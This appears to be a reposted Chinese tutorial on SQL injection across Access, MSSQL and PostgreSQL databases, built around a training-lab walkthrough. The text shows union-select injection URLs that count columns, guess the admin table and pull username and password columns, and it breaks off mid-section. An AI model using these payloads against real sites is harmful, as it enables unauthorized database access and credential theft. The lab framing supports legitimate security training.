当前位置:   article > 正文

Web漏洞-access注入、Sql Sever(Mssql)注入、PostgreSql注入、Orache注入、MongoDB注入、Oracle注入-SQLmap使用教程-附实例_your sqlmap version is outdated

your sqlmap version is outdated

一、导图

二、各种数据库的注入特点

1.access注入

  1. access数据库:
  2. access
  3. 表名
  4. 列名
  5. 数据
  6. mysql、mssql等数据库:
  7. 数据库名
  8. 表名
  9. 列名
  10. 数据
  11. --->比正常其它数据库少一级,其数据库保存在网站原码下面。
  12. --->后缀格式为mdb、asp、asa,可以通过一些暴库手段、目录猜解等直接下载数据库。
  13. --->另一个网站的数据库假如也是access,则其数据库也保存在它自己网站原码的目录下,
  14. 和上一个网站没有任何关系,将不存在跨库注入。
  15. --->access没有文件读写。
  16. --->access三大攻击手法
  17. 1.access注入攻击片段-联合查询法
  18. 2.access注入攻击片段-逐字猜解法
  19. 3.工具类的使用注入(推荐)
  20. --->access注入攻击方式
  21. 主要有:union注入、http header注入、偏移注入等

实例

本实例来自墨者学院

第一步:判断字段数

  1. 219.153.49.228:49079/new_list.asp?id=1%20order%20by%204
  2. 返回页面正常
  3. 219.153.49.228:49079/new_list.asp?id=1%20order%20by%205
  4. 返回页面不正常
  5. ------>列数(字段数)为:4

第二步:猜解表名

因为access数据库不包含数据库名,所以直接从表名开始查询。

因为access数据我库不像Mysql数据库中存在系统数据库“information_schema”,所以在注入过程中需要我们进行暴力猜解。

  1. 向网站末尾添加猜测的表名
  2. 如果数据库中存在此表,网页就会返回数字
  3. 如果数据库中不存在此表,网页就会返回错误
  1. 219.153.49.228:49079/new_listasp?id=1%20union%20select%201,2,3,4%20from%20admin
  2. 页面返回数字,存在表名admin
  3. 219.153.49.228:49079/new_listasp?id=1%20union%20select%201,2,3,4%20from%20dsadasdasd
  4. 页面返回错误,不存在表名dsadasdasd

第三步:猜解列名

猜解完表明后用同样的方法猜解列名

  1. 向网站内添加猜测的列名
  2. 如果数据库中存在此列,网页就会返回相应数据
  3. 如果数据库中不存在此列,网页就会返回错误
  1. 219.153.49.228:49079/new_list.asp?id=1%20union%20select%201,username,passwd,4%20from%20admin
  2. 经过不断猜解,最终正确列名为username和passwd,成功查询出了数据。

第四步:密码解密

第五步:登录后台获取KEY

第六步:提交KEY

2.Sql Sever(Mssql)注入

详细内容可参考“MSSQL注入

Sql Sever注入

实例

本实例来自墨者学院

判断数据库类型

判断数据库版本

使用工具

Mysql注入

------>注意与Mysql进行对比。

判断数据库版本

3.PostgreSql注入

实例

本实例来自墨者学院

数据库识别

  1. ┌──(root
    声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/知新_RL/article/detail/370747
    推荐阅读
    相关标签